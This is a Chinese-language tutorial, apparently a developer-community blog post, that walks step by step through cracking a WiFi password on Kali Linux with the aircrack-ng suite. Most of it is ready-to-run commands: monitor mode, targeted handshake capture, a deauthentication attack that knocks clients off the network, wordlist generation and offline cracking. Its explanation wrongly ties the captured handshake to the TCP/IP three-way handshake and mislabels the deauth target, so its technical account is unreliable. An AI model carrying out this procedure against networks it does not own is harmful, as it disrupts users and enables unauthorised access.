Kail Linux使用aircrack-ng破解WiFi

前言:    

    闲着无事,就自己开了个热点打算自己破解以练习kali Linux 和 Linux 的使用

         准备:将准备好的无驱无线网卡接入kali虚拟机

1.查看无线网卡是否接入成功

    命令: iwconfig

2.启动无线网卡监听模式

   命令:airmon-ng start wlan0

3.开启无线监听模式后,查看网卡经营模式是否已开启

命令: iwconfig

 

4.启动airodump-ng 扫描附近的wifi

命令格式 : airodump-ng  无线网卡名称

网卡名称可以用iwconfig 命令查看

命令:airodump-ng wlan0mon

这样附近的wifi名称 及各种数据就有了 

此时记下 前面的BSSID(可以认为是一种MAC地址)CH (信道) ESSID (wifi名称) ENC(wifi加密方式)  

5.监听该wifi 并获取 握手包

    命令格式 airodump-ng -c CH -w 数据包保存的位置/文件名称 --bssid  MAC地址  无线网卡名称

例: airodump-ng -c 1 -w /root/cap/er8 --bssid  0c:D8:6c:1E:BB:60 wlan0mon

可以看到该WiFi中连接有一个设备

6.接下来就要等待连接在这个wifi中的设备进行一个断开,重新连接的的过程,以为根据http/IP协议中,会有三次握手,这三次握手会有握手包的产生

如果没有我们可以手动将该设备进行一个断开攻击 重新打开一个客户端执行以下命令

命令格式:aireplay-ng -0 攻击次数 -a 设备的MAC地址  无线网卡名称

PS:设备的MAC地址既STATION 值  攻击次数为0时 为无限次攻击

命令:aireplay-ng -0 5 -a 0c:D8:6c:1E:BB:60 wlan0mon

7.在原来的客户端里可以看到已经抓到了握手包

8.此时我生成一个密码字典

命令格式: crunch 生成字典中最小的数的密码  生成字典中最大的数的密码 字典中会出现的字符 (由于时间关系,此处我只填了123)

命令:crunch 10 10 123 >>/root/123.txt

 

9.用刚刚生成的密码字典进行跑包

命令 aircrack-ng -w /root/123.txt /root/cap/er8-01.cap

命令格式: aircrack-ng -w  密码字典目录  握手包目录

 

 

 

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐